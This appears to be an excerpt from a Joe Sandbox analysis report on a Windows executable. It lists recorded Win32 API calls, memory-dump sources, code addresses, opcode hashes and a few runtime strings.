                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                                                                                    • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                                    • Opcode ID: f60be802e30b1208b6d8c11cfb7e8cbb38a56493507a9c7c575ffc571fafbf84
                                                                                                                                                                                                                                                                                    • Instruction ID: 9b0d5afaf62b8c33b48383e60f1f96428cd38bd9613d079e8d8c8ac350b2c977
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f60be802e30b1208b6d8c11cfb7e8cbb38a56493507a9c7c575ffc571fafbf84
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18819F729043459BCB24EF14C484BBAB3E8FF84311F5448DAF889EB251DF34D9498B92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00AE74D7
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE7567: GetClientRect.USER32(?,?), ref: 00AE758D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE7567: GetWindowRect.USER32(?,?), ref: 00AE75CE
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE7567: ScreenToClient.USER32(?,?), ref: 00AE75F6
                                                                                                                                                                                                                                                                                    • GetDC.USER32 ref: 00B26083
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B26096
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00B260A4
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00B260B9
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00B260C1
                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B26152
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                                    • String ID: U
                                                                                                                                                                                                                                                                                    • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                                                                    • Opcode ID: cd7a19654adf0f771abb0947387e2c8ccd541ce96c19715d36e1cca27d5cdd31
                                                                                                                                                                                                                                                                                    • Instruction ID: b0a0ee504f7b21242512bfadd5e04fff799279cc7591fe62e675c72618c0c4e0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd7a19654adf0f771abb0947387e2c8ccd541ce96c19715d36e1cca27d5cdd31
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D71E030500255DFCF25DF64EC84AAA3BF1FF48321F1446A9ED596A2A6CB319C90EB50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00AE24B0
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE19CD: GetCursorPos.USER32(?), ref: 00AE19E1
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE19CD: ScreenToClient.USER32(00000000,?), ref: 00AE19FE
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE19CD: GetAsyncKeyState.USER32(00000001), ref: 00AE1A23
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE19CD: GetAsyncKeyState.USER32(00000002), ref: 00AE1A3D
                                                                                                                                                                                                                                                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00B795C7
                                                                                                                                                                                                                                                                                    • ImageList_EndDrag.COMCTL32 ref: 00B795CD
                                                                                                                                                                                                                                                                                    • ReleaseCapture.USER32 ref: 00B795D3
                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00B7966E
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B79681
                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00B7975B
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                                                                    • API String ID: 1924731296-2107944366
                                                                                                                                                                                                                                                                                    • Opcode ID: 5bb7ed27f7af1e909c5451aee5526b9461f339759b52f612b093d7c8475a7229
                                                                                                                                                                                                                                                                                    • Instruction ID: 52b109648a331ad49aad42c81786b409201a305494afadd3ac4f5d0de926b1c3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5bb7ed27f7af1e909c5451aee5526b9461f339759b52f612b093d7c8475a7229
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97516C71104340AFD714EF24CC9AFAA77E4FF84754F400A68F9AA972E1DBB19944CB52
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B5CCB7
                                                                                                                                                                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B5CCDF
                                                                                                                                                                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B5CD0F
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00B5CD67
                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 00B5CD7B
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00B5CD86
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                                    • Opcode ID: ab9146013880b14bf930850fd010372d881863a40bb364be7939f26f4cc8eebd
                                                                                                                                                                                                                                                                                    • Instruction ID: e5c52981f39bfaa5fc552e1c870d3aef820a00c5a551d417d0fb66d0d428604e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab9146013880b14bf930850fd010372d881863a40bb364be7939f26f4cc8eebd
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D318D71500308AFD721AF648C88BAB7FFDEF45781B1045AAF84AD3240DB30ED499B60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B255AE,?,?,Bad directive syntax error,00B7DCD0,00000000,00000010,?,?), ref: 00B4A236
                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000,?,00B255AE,?), ref: 00B4A23D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00B4A301
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                                    • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                                    • Opcode ID: de350a67d032ca9995f9f06066bfd03832045d7c0e0b698360b16ac92a28e850
                                                                                                                                                                                                                                                                                    • Instruction ID: ddf3d13686802ea08a73cda3844377dccc799fed6f4219b3c47089b7c2132a27
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de350a67d032ca9995f9f06066bfd03832045d7c0e0b698360b16ac92a28e850
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA21A83189425EEFCF01AF90CC4AEEE7BB9FF18700F004495F515660A2EB71A658EB11
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetParent.USER32 ref: 00B429F8
                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00B42A0D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B42A9A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                                    • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                                    • Opcode ID: 950cb5e39ef22edf07193fd43f2047b6bfa233e5bf7f07d0eb8d3f3c32122d48
                                                                                                                                                                                                                                                                                    • Instruction ID: cafeda3c07853132ad4d9da6e49e65831838fa3ee328a19a1d5e9927cf400088
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 950cb5e39ef22edf07193fd43f2047b6bfa233e5bf7f07d0eb8d3f3c32122d48
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D11A3B6648306B9FA2467209C07DA63BECDF16764BA001A2FA04E50E1FF61AD417514
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00AE758D
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00AE75CE
                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00AE75F6
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00AE773A
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00AE775B
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ed1c0c3703aeefb030ebdcc0ef0f1f0418c47d3491b2b28941ddc27e9a824850
                                                                                                                                                                                                                                                                                    • Instruction ID: 4e91d8820dd4a2457d859ee3816aa730db5bef9b976145be4f866955de0d59ad
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed1c0c3703aeefb030ebdcc0ef0f1f0418c47d3491b2b28941ddc27e9a824850
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AC16B7990465AEFDB10CFA9C980BEDBBF1FF18314F14841AE899E3250DB34A951DB60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 06e60326e7cf9713f2822e73cd590c0027eeedc45882e40276468a7c6645c2f5
                                                                                                                                                                                                                                                                                    • Instruction ID: 7b118e95008dd1b3da9e5ef5522f5b6fa1696ac137a8857fe35f54a155d6037c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06e60326e7cf9713f2822e73cd590c0027eeedc45882e40276468a7c6645c2f5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C6126B1A04315AFDB25AF78E8827EE7BE4DF01320FD406FDE914A7285DB7199808791
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00B75C24
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00B75C65
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 00B75C6B
                                                                                                                                                                                                                                                                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00B75C6F
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B779F2: DeleteObject.GDI32(00000000), ref: 00B77A1E
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00B75CAB
                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B75CB8
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B75CEB
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00B75D25
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00B75D34
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3210457359-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 6b3d753db158313158ed84a6caa36f46e97684e13790427b533b46307b5c7cd3
                                                                                                                                                                                                                                                                                    • Instruction ID: 491fc55a2b14b6f34b3816bfd082bca6f1cbba04b8e7b803914f3154934ee1df
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b3d753db158313158ed84a6caa36f46e97684e13790427b533b46307b5c7cd3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD516130640A08BFEF359F24CC49F983BE5EB04750F14C195B53DAA2E1CBB5A980DB81
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00B228D1
                                                                                                                                                                                                                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00B228EA
                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B228FA
                                                                                                                                                                                                                                                                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00B22912
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B22933
                                                                                                                                                                                                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00AE11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00B22942
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B2295F
                                                                                                                                                                                                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00AE11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00B2296E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1268354404-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 04379a8ca1881d3440bbb429a3b5c59d0798f1526da537c462d858c38edafa6b
                                                                                                                                                                                                                                                                                    • Instruction ID: eb06c5773996dc57ddc75a8b7f752fa1782e16f2e2ab0982a8e1e16c033729c9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04379a8ca1881d3440bbb429a3b5c59d0798f1526da537c462d858c38edafa6b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38516870600259AFDB24CF26CC45BAA7BF5EF48750F104528F95ADB2E0DB70E990DB50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B5CBC7
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00B5CBDA
                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 00B5CBEE
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B5CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B5CCB7
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B5CC98: GetLastError.KERNEL32 ref: 00B5CD67
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B5CC98: SetEvent.KERNEL32(?), ref: 00B5CD7B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B5CC98: InternetCloseHandle.WININET(00000000), ref: 00B5CD86
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 337547030-0
                                                                                                                                                                                                                                                                                    • Opcode ID: de6fccbd8eeef6ba6972fe6fcd71b9b5eed17a3a8da4c9e2e26d2bc2f6f701db
                                                                                                                                                                                                                                                                                    • Instruction ID: d3541bd319e06de5d1b91be1e1137de435a5aeaa9257e694c07f54d44d74aacb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de6fccbd8eeef6ba6972fe6fcd71b9b5eed17a3a8da4c9e2e26d2bc2f6f701db
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2318971200705AFCB218F65CD84B6ABFFAFF04342B0045ADF85E87610CB30E859ABA0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B44393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B443AD
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B44393: GetCurrentThreadId.KERNEL32 ref: 00B443B4
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B44393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B42F00), ref: 00B443BB
